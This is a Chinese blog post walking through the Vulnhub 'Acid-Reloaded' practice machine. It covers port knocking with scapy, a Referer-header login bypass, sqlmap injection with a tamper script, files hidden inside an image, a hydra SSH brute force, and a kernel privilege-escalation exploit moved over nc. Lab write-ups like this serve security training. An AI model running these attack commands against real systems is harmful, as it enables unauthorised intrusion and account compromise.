Acid-Reloaded

最新推荐文章于 2022-02-04 22:45:51 发布
最新推荐文章于 2022-02-04 22:45:51 发布
阅读量300 收藏
点赞数
分类专栏: OSCP靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lonelyhat/article/details/118928361
版权

总结:

  1. Knock敲门程序是CTF中比较常见的,我们需要在规定时间内按照指定顺序对端口进行SYN的请求才能开放具有突破口的端口服务
  2. Scapy模块可以灵活的构造数据包
  3. 对于可疑文件使用file binwalk strings等命令进行查看
  4. Foremost命令可以分离文件
  5. Nc –l port > x.x 用来接收文件
  6. 对于提权与渗透前期是一样的,都需要前期的信息收集,例如netstat查看当前开放的服务是否有机会提权,编辑器是否可以直接修改/etc/pass文件,.bash_history一些历史记录,var下面的emali文件夹是否存在有用的信息,sudo –l 那些命令可以不需要密码就可以以root权限执行以及内核漏洞等等。
  7. Linux提权可以使用提权检测脚本会比较方便,

发现目标主机

目标主机IP:192.168.49.148

探测端口以及banner信息

开放22端口ssh服务但是33447是未知的

我们先连接ssh端口查看下信息

在之前的靶机中遇到过knock程序,简单来讲就是在规定时间内按照顺序依次向指定端口发送SYN请求后就会开放某个端口,显然这里是让我们依次向3 2 1端口一次发送SYN请求包然后33447就会对我们开放。

发送SYN请求包方法有很多,nmap扫描器中使用-sS参数就是SYN扫描

nmap –sS –p 3,2,1 192.168.49.148

我们这里使用scapy模块自己构造数据包进行发送请求,这样子比较灵活一点。

sr1(IP(dst=”192.168.49.148”)/TCP(dport=3,flags=”S”))

sr1(IP(dst=”192.168.49.148”)/TCP(dport=2,flags=”S”))

sr1(IP(dst=”192.168.49.148”)/TCP(dport=1,flags=”S”))

再使用nmap进行端口服务的探测

此时33447端口对我们开放了

使用浏览器打开

惯例,查看源码有没有提示信息-----卒

使用dirb进行目录扫描,找到一些可能有突破点的目录

 

还有nikto对主机的端口开放进行扫描

这两次扫描都对/bin目录体现出来,访问/bin目录

 

 

针对登录框,我尝试弱口令,前台验证,SQL注入等都没有成功,但是我们获取了他发送的目标页面

直接访问这个路径

http://192.168.49.148:33447/bin/includes/validation.php

 

尝试dirb爆破出的其他路径

http://192.168.49.148:33447/bin/dashboard.php

 

依然查看下源码有没有信息提供------卒

当我们点击login的时候他会跳转到登陆页面index.php

这里可能是我们在登陆页面成功后跳转到这个页面但是会提示登陆成功

看到bp的请求包中存在referer头是验证你从哪里来的

如果我们请求http://192.168.49.148:33447/bin/dashboard.php的时候附带erferer头信息表明我们是从登陆页面来的会不会提示登陆成功?但是这里我们要注意的是登陆页面的真实路径是http://192.168.49.148:33447/bin/includes/validation.php,抓登陆的请求包就可以看到也可以从登陆页面的前端中查看

进行erferer头的尝试

Referer:http://192.168.49.148:33447/bin/includes/validation.php

结果发现登陆成功

我们跳转到这个页面http://192.168.49.148:33447/bin/l33t_haxor.php

图片加载失败了

查看前端源码

 

 

好家伙,是不是不把我sqlmap放在眼里

先看看有没有注入点,有的话直接sqlmap了

存在注入点

使用sqlmap的时候可以尝试添加tamper

 

sqlmap --url="http://192.168.49.148:33447/bin/l33t_haxor.php?id=1" --tamper=space2comment.py --dbs -v

获取到数据库信息

继续获取secure_login数据库的表信息

sqlmap --url="http://192.168.49.148:33447/bin/l33t_haxor.php?id=1" --tamper=space2comment.py -D secure_login –tables

这里对我们提示UB3R/strcpy.exe路径下存在一个exe文件,下载下来进行查看

使用file命令以及binwalk命令查看文件类型以及文件是否存在捆绑

 

 

是个rar的压缩包,我们使用unrar x 命令进行解压

获取到一个txt文件以及图片文件

 

我们再对图片进行格式的查看

图片中依然存在rar文件,再次进行解压

查看txt文件

我们获取到了连接文件

 

查看连接文件的内容

这里存在一个像是base64编码后的字符串

之前遇到过这种坑,有的作者喜欢把密码设置成酷似base64编码的字符串例如xxxx==实际上他就是明文密码但是我们非要解码后登陆就容易心态炸。

我们先base64解码一下

NooB@123

NooB@123这个应该就是密码了,我们从xml文件中的字符串设置为用户名字典,使用九头蛇进行ssh爆破

设置用户名字典

 

 

使用九头蛇进行爆破

获取ssh登陆密码makke  NooB@123

连接主机

 

 

开始进行提权

查看老旧版本内核

在本地开启python的http服务蛋疼的是靶机中居然没有wget

莫得关系,我们使用nc进行文件传输,nc要是没有我就CV工程。

靶机中我们设置监听9995端口并将之后传输的文件保存到1.c

nc –l 9995 > 1.c

Kali中我们使用nc传输37292.c文件

nc 目标ip  目标端口 < 要传输的文件

nc 192.168.49.148 9995 < 37292.c

传输到靶机中赋予权限后gcc编译

查找flag

 

 

 

梵歆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CxBx-Reloaded-QT-GUI:最初尝试使用QT为CxBx-Reloaded创建新的GUI
02-05
CxBx-Reloaded-QT-GUI:最初尝试使用QT为CxBx-Reloaded创建新的GUI
靶机实战-Acid
滕财然的博客
01-26 778
Acid靶机实战 文章目录Acid靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问8080端口5、访问33447端口6、提权 1、主机发现 目标主机:192.168.232.160 我是用arp命令扫的,大家可自行选择 2、端口扫描 3、端口详细信息扫描 4、访问8080端口 只有一个文件,点击就会下载,先pass 5、访问33447端口 查看网页源代码: 发现一串16进制...
靶机渗透实战-Acid
qq_46540840的博客
02-04 3130
文章目录 这几天有点事情,靶机方面就没在更新,后边会积极的更新。 文章目录文章目录信息收集漏洞发现利用提权总结 信息收集 信息收集是必不可少的. 首先用自己的kali当攻击机,下载acid靶机 靶机下载地址 首先进行靶机发现 nmap -sn 192.168.240.1。1/24进行主机发现不尽兴端口扫描(128是kali地址) 然后对主机进行端口扫描 nmap -sV -T4 -A -p- 192.168.240.137 其中sV 扫描版本信息和开放的服务 , -A扫描开放端口的具体服务
渗透靶场——Vulnhub:Acid
tlovejr的博客
09-17 290
1、首先还是常规套路,kali攻击机器还有靶机均为net模式,然后扫描主机 2、找到存活靶机ip地址,然后我们继续开始信息收集 nmap -T4 -p- 192.168.40.130 3、访问8080端口没有结果,那么我们继续访问一下33447这个端口试一下 4、成功发现我们要继续做的这个界面,继续信息收集,目录扫描,但是并没有发现有用的信息 5、然后我们继续尝试一下robots.txt 6、发现也没有什么有用的信息,那么我们查看一下源码,看看有没有什么有用的信息 7、在查看源码的时候发现有一个有
记一次Acid靶机渗透
jiahuiquan的博客
03-14 194
基础环境 kali ip:192.168.1.139 靶机ip:位置,同一网段,linux系统 01.主机发现,得到目标靶机ip:192.168.1.177 02. namp扫描端口以及服务版本,可以看到34477端口有http服务 03.dirb扫描目标网站目录 04.尝试在浏览器访问扫描到的路径,并查看网页源码 发现一串加密过得16进制数,在工具内进行解密 05. 先还原为字符串,然后发现是base64编码,进行解密得到一张图片 06. 访问图片,然后下载到本地,在winhex内查看,没有发现
Carry-Stacker-Reloaded:发薪日2 BLT Mod
05-16
搬运堆垛机已重新装载现在由维护
Cauldron-Reloaded:ForgeBukkit 混合服务器
06-15
汇编 我们使用 Gradle 来处理我们的依赖项。 结帐项目。 初始化子模块:git submodule update --init --recursive --depth 1 设置工作区:gradlew setupCauldron 构建二进制文件:gradlew buildPackages 注意:...
pcsx-reloaded-1-9-93_stm32f407_
10-04
fhjn dhn f hsry aeehryj r rra t teshghfgdh ysefsg ns
Hyperion-Reloaded:是时候重新加载Hyperion
03-30
Hyperion重装上阵 介绍 “ Hyperion”(海伯利安)是一个在规定的主题(即关于虚拟世界的通用知识)和人物属性(即可以量化的参与游戏机制的数据)以及脚本模版(即结构化的数据形式)的替代下自动代替DM的工具 ...
backdoored
底层社会中的弱智
10-09 1904
总结: 目标靶机没有其他开放的端口,确定攻击方向就是1337 http服务端口。 访问页面后给出的flag位置提示,一个在用户文件夹下面还有root用户下面root.txt文件 使用提权的时候利用提权脚本,linpeas.sh+gtf进行搜索,找到tac命令进行提权。 直接访问/root/root.txt 获取最后的flag的值。 靶机评级:简单 需要一个好字典进行爆破 使用nmap 针对主机进行端口探测 仅出现1337端口为http服务 Nikto没有探测出信息 访问13
Android4
底层社会中的弱智
08-11 1618
总结: 物联网渗透中5555端口是安卓adb服务的默认监听端口,早些版本没有验证机制,所以遇到5555端口的话直接使用adb连接来尝试。 目标靶机IP:192.168.49.161 本机kaili的IP:192.168.49.129 查看开放的端口服务 22000开放ssh端口 8080是php-cli服务 5555端口是android服务默认的监听端口,也是物联网渗透中容易受到攻击的端口,在kali中首先安装adb后进行连接尝试。 安装adb连接工具 ADB工具的全称为 Andro
DC-3 步骤
底层社会中的弱智
09-18 1214
确认局域网中目标主机IP 确认目标开启的端口 确认IP为192.168.0.113 端口信息为:80端口 信息收集: 看得出使用joomla框架 针对性扫描 joomscan 确认版本号以及后台登陆页面,查到公开漏洞信息 存在注入,使用sqlmap进行注入先看看是否可以直接获取osshell以及sqlshell 卒 只能一步一步来 数据库 joomladb 表:#_users 选中username和password 查看密码 尝试使用john.
pwnlab_init
底层社会中的弱智
04-29 1055
找到目标IP 192.168.11.131 扫描端口 开放80端口 apache中间件版本暂无可用exp 3306mysql数据库 111 rdp远程桌面 先扫一下80的目录 看到config.php 然后可能存在注入 使用sqlmap无结果放弃注入 查看URL 可能存在文件包含 http://192.168.11.131/index.php?page=...
Kioptrix Level2
底层社会中的弱智
04-16 864
目标IP:192.168.11.176 端口开放情况: 先从80端口入手 使用抓包--爆破 暂不使用 测试注入 目录扫描 使用post传值,我们抓包后放到sqlmap中测试 添加*号优先测试 sqlmap -r q.txt --level 5 --risk 3 逐步跑出用户名和密码 sqlmap -r q.txt --level 5 --risk 3 -...
vulnhub之Five86-1
底层社会中的弱智
02-04 741
针对目标机器,先扫描找出靶机然后再扫端口查看服务 Nmap -Pn ip网段 是用nmap -A -p- -T4 192.168.127.130 查看详细的端口服务 上图可以得知: 22端口SSH服务开启(攻击方法有 针对第三方SSH软件版本漏洞的攻击 暴力破解 匿名登录 弱口令) 80端口是HTTP服务(网站的十大常规漏洞 第三方框架WORDPRESS之类 apache解析漏...
AI-Web-2.0
底层社会中的弱智
08-08 719
小总结: 目录遍历漏洞常见的位置,例如在前端中看到某些image标签<img src=/images?file=png>,那么这里就可能存在任意文件读取漏洞。当时看到这个框架存在任意文件读取漏洞,我就在想如果没有其他漏洞可以进行组合利用,我如何最大化的利用任意文件读取? 那就是利用默认的配置路径进行配置信息的读取,尽可能多的获得配置信息。 所以在在即搭建网站的时候要修改默认的端口,默认的路径,默认的密码,这些都是潜在的危险。 判断中间件的版本信息然后根据对应版本信息的默认路径进行文件读取。
vulnhub之Me-and-My-Girlfriend-1
底层社会中的弱智
01-03 645
像之前的套路一样,nmap真香 找到了目标主机,IP为172.16.12.15 进行端口侦测: 22号端口是ssh服务(弱口令登录,爆破,一些攻击载荷) 80号端口中间件是apache的2.4.7(常规的网站漏洞扫面) 先打开网页看看: 注意提示信息很重要!意思就是让我们抓包改包,把x-forwarded-for这个参数的值改为本地(localhost) 启动bp来尝试: ...
64Base_3mrgnc3
底层社会中的弱智
07-12 618
总结: 这个靶机出现了几个奇怪的端口,使用nc或者telnet命令来连接端口查看信息 nc –nv ip port telnet ip port 前期的信息收集,不仅仅是nmap 还可以使用nitko –h、whatweb等等进行收集信息 Html2dic工具可以将页面的关键字转换成字典 Wget url –rq –O xxx.out Html2dic xxx.out | sort –u > xxx.dict 使用公钥登陆的时候要将公钥的权限调制最小 ssh –p 端口
reloaded modules怎么解决
最新发布
06-06
"reloaded modules" 是指重新加载模块时出现的问题。解决方法可能因情况而异,但以下是一些可能的解决方案: 1. 检查代码中是否有循环依赖。如果有,尝试重构代码以消除循环依赖。 2. 确保在重新加载模块之前,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值